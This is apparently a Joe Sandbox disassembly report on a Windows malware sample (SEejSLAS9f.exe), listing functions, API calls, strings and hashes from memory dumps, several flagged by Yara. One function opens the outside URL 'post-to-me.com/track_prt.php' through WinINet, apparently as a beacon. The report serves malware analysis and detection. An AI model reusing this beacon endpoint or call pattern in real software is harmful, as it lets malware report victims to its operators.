                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                              • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                              • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                              • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                              APIs
                                                              • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                              • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                              • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                              • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                              • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                              • String ID:
                                                              • API String ID: 2583373041-0
                                                              • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                              • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                              • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                              • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                              APIs
                                                              • _free.LIBCMT ref: 024A19AF
                                                                • Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
                                                                • Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9
                                                              • _free.LIBCMT ref: 024A19C1
                                                              • _free.LIBCMT ref: 024A19D4
                                                              • _free.LIBCMT ref: 024A19E5
                                                              • _free.LIBCMT ref: 024A19F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                              • Instruction ID: eab23c0ae3902ff33b016c09165dc377b5b01624257cc4ec4544991858f8d174
                                                              • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                              • Instruction Fuzzy Hash: FEF03070D047109F9F716F19AD904053F65AF29B62B0002ABF406977B2D774E862DF8E
                                                              APIs
                                                              • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0248CF36
                                                              • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0248CF67
                                                              • GetCurrentThread.KERNEL32 ref: 0248CF70
                                                              • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0248CF83
                                                              • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0248CF8C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                              • String ID:
                                                              • API String ID: 2583373041-0
                                                              • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                              • Instruction ID: e6a92c96a1e9fdf56f5bc352c87485f8e7f320f972e9c2675893e6a14a246b5b
                                                              • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                              • Instruction Fuzzy Hash: 57F03736211500DBC629FF62E6909BFB7B6AFC4610310455FE68747590CF21A947DB71
                                                              APIs
                                                              • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472E8E
                                                                • Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471328
                                                                • Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471344
                                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024730A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InternetOpen_wcslen
                                                              • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                              • API String ID: 3381584094-4083784958
                                                              • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                              • Instruction ID: d5ccd31b2cbb2af03a9fe18a5c51409eb2b1ea8232e5f65add460cab39c645ed
                                                              • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                              • Instruction Fuzzy Hash: CA5153A5E55344A8E320EFB0BC45B723378FF58712F10543BD528CB2B2E7A19944871E
                                                              APIs
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0249896A
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 02498A23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: fB$csm
                                                              • API String ID: 3480331319-1586063737
                                                              • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                              • Instruction ID: 5ca6f334394dd3f6877c4931c8ecc33140facd94952ab1d27af6a3bf6aac2051
                                                              • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                              • Instruction Fuzzy Hash: 8741D434A002489FCF10DF2DC884AAEBFA5AF46328F14816BE9159B391D7329A01CF91
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SEejSLAS9f.exe,00000104), ref: 0042F753
                                                              • _free.LIBCMT ref: 0042F81E
                                                              • _free.LIBCMT ref: 0042F828
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\SEejSLAS9f.exe
                                                              • API String ID: 2506810119-2559146330
                                                              • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                              • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                              • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                              • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SEejSLAS9f.exe,00000104), ref: 0249F9BA
                                                              • _free.LIBCMT ref: 0249FA85
                                                              • _free.LIBCMT ref: 0249FA8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\SEejSLAS9f.exe
                                                              • API String ID: 2506810119-2559146330
                                                              • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                              • Instruction ID: d499d96f1402e211989b74375e3031a87a9e10ca23de15f59ada815345c43f70
                                                              • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                              • Instruction Fuzzy Hash: 7D317C71A00258EFDF21DF9A9C8099EBFFCEF99710B1140ABE804D7621D6709A44CB90
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0247C8DE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8Throw
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 2005118841-1866435925
                                                              • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                              • Instruction ID: 049c6727811fb1aa356781be3b944feec525705c1a35b402c3ec987ade1b52c4
                                                              • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                              • Instruction Fuzzy Hash: 68F050B3C406086BCB04EA54CDC1BEF33989B06316F04806FDD62AB182EB789945CFA4
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                              • ExitThread.KERNEL32 ref: 0042DFDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                              • String ID: F(@
                                                              • API String ID: 3213686812-2698495834
                                                              • Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                              • Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
                                                              • Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
                                                              • Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
                                                              • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                              • ExitThread.KERNEL32 ref: 0042DFDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                              • String ID: F(@
                                                              • API String ID: 3213686812-2698495834
                                                              • Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                              • Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
                                                              • Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
                                                              • Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E
                                                              APIs
                                                              • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00424319
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                              • String ID: pScheduler
                                                              • API String ID: 1381464787-923244539
                                                              • Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                              • Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
                                                              • Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
                                                              • Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D
                                                              APIs
                                                              • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041E660
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                              • String ID: pContext
                                                              • API String ID: 1990795212-2046700901
                                                              • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                              • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                              • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                              • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                              • _free.LIBCMT ref: 0042E069
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: CloseFreeHandleLibrary_free
                                                              • String ID: B
                                                              • API String ID: 621396759-3071617958
                                                              • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                              • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                              • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                              • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                              APIs
                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                              • String ID: pScheduler$version
                                                              • API String ID: 1687795959-3154422776
                                                              • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                              • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                              • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                              • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                              • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                              • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                              • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                              • Instruction ID: df72fd2d1c62846be8c75fdec26bbffb4d4cd5b66c90d805d6ba129b5335aa4c
                                                              • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                              • Instruction Fuzzy Hash: 78A15972D013869FEB26CF28C9A57AEBBE1EF65314F58816FD5859B381C3348941CB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                              • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                              • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                              • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                              • Instruction ID: ed7d319149688fe1d7b3a0bbed2b2bc2aa4460cb3770df107cb724985efca93d
                                                              • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                              • Instruction Fuzzy Hash: 3D41AF31A00600ABDB226FBE8C60BAF3B66EF31730F11061FF42AD66D0D77644458BA1
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024A047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024A6B51
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024A6BDA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024A6BEC
                                                              • __freea.LIBCMT ref: 024A6BF5
                                                                • Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                              • Instruction ID: 93e2e34bc3baba9a00dc80a189d8fe73fa1c5d60f0dd9a58292053eb7113b7da
                                                              • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                              • Instruction Fuzzy Hash: FA31D072A0121AABDF24CF65CC50DEF7BA9EF50714B0A426EEC14D7290EB35D951CB90
                                                              APIs
                                                              • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                                • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                              • String ID:
                                                              • API String ID: 2630251706-0
                                                              • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                              • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                              • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                              • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                              APIs
                                                              • ShowWindow.USER32(00000005), ref: 00401FAF
                                                              • UpdateWindow.USER32 ref: 00401FB7
                                                              • ShowWindow.USER32(00000000), ref: 00401FCB
                                                              • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$MoveUpdate
                                                              • String ID:
                                                              • API String ID: 1339878773-0
                                                              • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                              • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                              • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                              • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                              • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                              • String ID:
                                                              • API String ID: 737400349-0
                                                              • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                              • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                              • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                              • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                              APIs
                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0249934A
                                                                • Part of subcall function 02499297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024992C6
                                                                • Part of subcall function 02499297: ___AdjustPointer.LIBCMT ref: 024992E1
                                                              • _UnwindNestedFrames.LIBCMT ref: 0249935F
                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02499370
                                                              • CallCatchBlock.LIBVCRUNTIME ref: 02499398
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                              • String ID:
                                                              • API String ID: 737400349-0
                                                              • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                              • Instruction ID: 498d1580d0e3659feca5257187e3c93cc0b12885d0de557d3f13b2bc4cda5061
                                                              • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                              • Instruction Fuzzy Hash: EF01D772100148BBDF125E96CC41EEB7F6EEF48754F05441DFE5896120D776E861EBA0
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                              • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
